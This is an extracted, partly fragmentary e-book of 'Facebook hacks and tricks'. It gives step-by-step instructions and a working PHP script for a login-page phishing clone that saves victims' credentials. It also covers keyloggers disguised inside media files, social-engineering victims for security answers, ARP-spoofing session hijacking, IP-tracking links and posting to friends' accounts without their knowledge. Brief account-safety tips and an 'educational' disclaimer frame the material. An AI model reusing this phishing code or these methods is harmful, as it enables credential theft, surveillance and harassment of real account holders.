Documente Academic
Documente Profesional
Documente Cultură
About the Author ........................................................................................................................................................... 3 Acknowledgement ......................................................................................................................................................... 4 Hacking Facebook .................................................................................................................................................. 6 Phishing ................................................................................................................................................................ 7 Keyloggers ............................................................................................................................................................. 9 Social Engineering .............................................................................................................................................. 10 Session Hijacking12 Hacking by Stealing Password from Stored Cookies...13 Facebook Tips, Tricks & Prank..14 How to Actually Change Color of You Facebook....15 How to Get Hundred's of Likes on Facebook.17 Facebook Status/ Chat Hacks18 Update Status with an iPhone even if You Have a Nokia Phone..19 Update Your Friend's Status without Telling Him ..19 How to Trace Anyone on Facebook..21 How to Update Status as a Celebrity or Anyone You Want....22 Flood Your Friend's Wall and Inbox..23 How to Remove Advertisements, Auto Poke and Customize Your Facebook the Way You Want...26 Some Tips to Stay Safe on Facebook..28 Conclusion.33 More Sites To Look For.34 Disclaimer..35
Follow Him on Twitter @shikhilsharma . Contact Him on Facebook @shikhilsharma Drop him a mail at shikhil587@gmail.com .
Acknowledgement
Success of a person is not a work of one but due to cumulative effort of a number of people. I would like to thank my parents, family and almighty for their constant support. A peaceful and supportive environment was provided to me by the people around. I would like to thank Ishan Garg for designing the cover page. He can be contacted for further assignment here. Nishit and Joy surely deserve big thank for editing this book and being the first readers. Ill also thank Shubham, Priysha, Shriya, Aanchal, Sankalp, Ayur Mayank, Lalit, Simar, Vinit, Samrath, Ruby, Baljeev, Abhishek and entire Raju and co. All my friends in field of cyber security including Abhinav Sharma, Lakshya, Gaurav are also thanked for their constant support. A special mention to Vivek Ramachandran for being a person to whom I always look up to. A big thank to entire Hacking Tweaks Family for being a source of constant motivation and all my readers for reading HackingTweaks.com . I promise that Ill keep providing quality content in future too.
Note: The below mentioned methods are just to make the reader aware of, how they can be trapped by attackers using malicious techniques and few steps to prevent such attacks. Methods below should not be used by the reader to break into someones account. The author would not be responsible if found doing such.
Hacking Facebook
I see a number of posts from people in facebook groups, pages and also all around the web requesting a hacker or a techie to a HACK facebook for him. These kind of request are from people who know nothing about technology or hacking and they think that a hacker knows some magical spells which he will recite and the account of the victim will be hacked! This is surely not the truth. Hacking facebook is not that easy as it seems to be.
Tip: There are NO facebook hacking softwares in which you have to fill the username of the person to hack and you get his facebook password!
As mentioned above there is no direct software available to hack facebook but there are a number of methods available by which facebook can be hacked. These methods include phishing, keyloggers, social engineering, session hijacking, USB hacking, RATs etc. In the following section, I will be discussing methods in detail which attackers use to hack a facebook account. The methods are explained in detail so that you can take better measures to protect your facebook account and increase its security.
Phishing
Phishing is a method of hacking facebook in which an attacker provides the victim with a malicious URL which redirects him to a page which looks just like facebook. Mistaking that page with facebook, the user enters his username and password there and the entered username and password go directly to the attacker. Facebook Phishing is carried out by attacker in the following way: 1. Firstly, create an account on a web hosting site where they upload all there malicious files. 2. Go to facebook.com and do a ctrl+s on login page of facebook to store its html format so that they can make the required changes in it and upload on the web hosting site. 3. View the source code of the login page and search for
action="https://www.facebook.com/login.php?login_attempt=1" method="post"
4. Replacing the above line of code with login.php. And renaming the file to index.htm. 5. Now a php file named login needs to be created. 6. To create the login.php file type the following code given on next page in your favorite text editor and name the file as login.php
<?php header("Location: http://www.facebook.com/"); $handle = fopen("password.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
7. Make a new txt file by the name of passwords.txt. 8. Make a folder by the name of facebook and put index.htm, login.php and password.txt in it. 9. Upload all the contents of the folder to your web hosting site and choose the name of the URL from webhosting site such that the victim does not suspect it. 10.Now give the URL to the victim and as soon as he enters his username and password in phishing page, password.txt file will store credentials of the victim.
FACT: The term Phishing was coined by Hackers when they attacked AOL.
Keyloggers
A keylogger is a tool which records all the logs of the system of the victim when installed in his system. A keylogger is capable of recording keystrokes, screen, webcam logs and almost everything a person is doing on his system. After recording all the logs of the system the keylogger sends them to the victim. Keyloggers are used by hackers to get credentials of facebook account by installing the keylogger in victim machine. But keyloggers are also used by many parents all around the world to monitor the logs of the computer of their children in order to know what their children are up to.
Types of Keylogger:
There are basically two types of keyloggers: 1. Physical Keylogger: It is a keylogger which an attacker installs in the system of the victim when he has physical access to victims computer. The keylogger records all the logs including the facebook password of the victim and send them to mail of the attacker which he has configured while installing the logger or the logs are collected physically by the attacker when accesses the victims computer next time. 2. Remote Keylogger: A remote keylogger does the same work as the physical keylogger but it is installed on the victim machine remotely by the attacker. The attacker can crypt the keylogger file with a song, picture and give it to the victim and as he opens the song or picture the keylogger gets installed in victim computer. The logger keeps sending logs to the victim via mail or ftp. Tip: You can use http://www.fb.com instead of http://www.facebook.com to load the facebook page faster.
Social Engineering
Social engineering is a technique in which a hacker tries to get sensitive information out of the victim by using his communication skills. The sensitive information the attacker tries to get can be the username, password, answer to security question etc. Social engineering has been evolved some time ago only and one world famous hacker who amazed everyone with his social engineering techniques was Mr.Kevin Mitnick. Kevin started hacking at an early age of 12 using social engineering to bypass punchcard system used in Los Angeles bus system by playing social engineering on bus driver.
2. Don't straight away ask the answer to security question, first talk some random stuff. 3. Get to the question slowly and steadily so that victim doesn't suspect you. Trust me, Social Engineering is one of the Best Methods to Hack any account .All you need is presence of mind and ability to communicate well with people.
Trick: Use symbols used in above picture using http://fsymbols.com/ and many more.
Session Hijacking
Session Hijacking refers to an attack in which a hacker temporarily hijacks the ongoing session of the user and he is able to see what the user is doing. Facebook is used so much by everyone these days that it is the most exploited website when it comes to session hijacking as most of the times people are accessing facebook using mobile, computer etc.
Steps of using:
1. 2. 3. 4. Open the app. Check "ARP-Spoofing" and "Genric Mode". Click on Start. In some time you will start getting various facebook sessions on the same network of wifi. Click on them to see what the person is doing.
Trick: To post a blank status update, just copy the following code and update it as your status: "@[0:0: ]" (don't copy the commas).
Tip: Make it a habit to delete cookies every alternate day as they contain sensitive information about the work you do online.
This is a section which contains a number of facebook trick, trips and pranks which you can play on your friends using facebook. You see on facebook fake posts claiming to change facebook color, giving hundreds of likes etc. In this section you will find 100% working ways of doing such things which till now you have only heard of.
Changing color of your facebook account is very simple. If you want to change color of your facebook account, follow these simple steps: 1. Download a plug-in called Greasemonkey/Tampermonkey.
Mozilla user can download it here and Chrome users here. 2. Install the above downloaded plug-in in your browser. 3. Now install a script from here by clicking "Install" button on right side.
5. 6.
Once the script is installed open up your facebook account. As your account is open click on "Tools" menu of your browser and then click on "User Scripts Commands". In further drop down menu from User Scripts Commands select "Customize Facebook Colors". Now you can easily customize facebook colors are see the change!
7. 8.
3. You can now simply follow the instructions given on the site to get likes.
4. Mail on that id from your account (gmail, yahoo, etc.) and what you want victim's status to be, put that as the "subject" of the mail.
Now the status of your choice will be updated in your friends account.
Trick: http://facebook.com/profile.php?=73322363 : This URL which looks as if will take you to some other facebook page actually opens the profile of the person whoever clicks it.
2. In the Enter URL or Tracking Code add a URL in which victim will be interested and you are sure he will open that site. 3. Now click on create URL. 4. A new link will be generated which you will have to give to the victim and you will also be given a code too. 5. After the victim has clicked it put the link again on the site and click Track URL. Then give the code to get the IP of the victim.
Do you want to create funny wall posts like the one above? You can do that simply in no time! Now I am going to tell how create a fully customizable wall post and play pranks on your friends. Follow the following steps: 1. Go to http://thewallmachine.com/ and you will see something like below.
2. Now make you sure you connect your facebook account with this site. 3. When connected, upload the photo of celebrity/friend you want to make wall post as then update the status. You can also customize the date when the status was updated.
7. Now we have successfully flooded the wall of our friend as you can see ;).
Trick: http://laterbro.com/ is site which allows you to pre-schedule your status update, so you can write a status and specify the time when it should be published.
How to Remove Advertisements, Auto Poke and Customize Your Facebook the Way You Want
For the tricks discussed in the following section you need to download Greasemonkey/Tampermonkey for Mozilla or Chrome as per your choice.
Source : 1jesoba.com
What is Greasemonkey?
Greasemonkey or Tampermonkey is a Plug-in which allows you to install scripts in your browser which make your browsing experience better. How to Use It? Once you have downloaded it you will have to install various scripts too and you will find its utilities in the tools menu of your browser and in some scripts you also get an extra option of when you right click.
Source : 2access.ecs.saton.ac.uk
Autopoke
Autopoke is a script available which will automatically poke the person who pokes you. It can be installed from here.
I see a lot people complaining that their facebook account was Hacked or Hijacked. I personally think that if you have high security on your account it becomes very difficult for the hacker to exploit it. I've seen pictures of a number of girls in various pages/groups and it is evident that those pictures are illegally taken from the accounts of girls and now are being exploited. These are some things which are over looked by many people using facebook if taken seriously, they can increase the security of your account many times.
3. You will see e-mail associated with your account, from there you can control who can see your e-mail.
2. Now select the Security option from the left side of privacy settings page.
4. Click on Save changes and now your will get notifications on your phone as soon as someone logs in from unrecognized device, but initially you will have to provide facebook with recognized devices as you log in after enabling this feature.
Password should not be guessable by anyone. It should contain above 6-7 character. Numbers should be there. Remember to put special keys like /,>,!,$,^ etc.
A good password is one which uses a combination of all the above types of keys mentioned.
Conclusion
This was my attempt to share all tips and tricks from all around the web with you which would make you a Facebook Pro. I hope after reading this book you are able to make your entire facebook experience better and you are able to secure your facebook account in a better way. Do give your feedback about the book, both positive and negative feedbacks are welcomed. Dont hesitate in pointing out my mistakes. Do you think its over here? It isnt! Do check out http://www.hackingtweaks.com for more hacks, tips and tricks!!
Hacky Shacky (HS) is a Platform for all those people who want to share their knowledge with others. Originally founded by Lakshya Verma a.k.a li0n hear7, HS is Best Blog for people who enjoy learning new things. HS is Supported and contributed by Administrators and Members of Various Underground Hacking Groups and Communities Worldwide
Cyber Kendra is a place where user can get the information related to IT, Computer and technology. This site is all about Computer, IT and Technologies that are innovating day by day. Our aim is to give all the relevant information about the IT and Computer technology. Here we share all the content related to Tech and Internet world. Author: Vivek Gurung : He is the Founder and Editor-in-chief of 'Cyber Kendra'. He is Certified Information Security Expert and an Ethical Hacker. Apart from this he is Internet activist, love to learn about technology innovations. Very much interested in Cyber Security. Find him on google + and twitter.
http://techreviewphones.blogspot.in/
The ultimate smart phone guide blog: New blog but with quality content. Do check it out.
Disclaimer
This book consists of Facebook Hacks and Tricks from all around the web. Author does not claim be their original writer, it is only compiled by him. Some pictures have been taken from google.com. If anyone has any problem with the content of this book then please contact the author. This book is not written with an aim to promote hacking but to make people aware of the methods by which the security of their accounts can be compromised so that they take prior precautions. Author does not take any responsibility for any misuse done by anyone after reading the content of this book. This book is only written for educational purposes.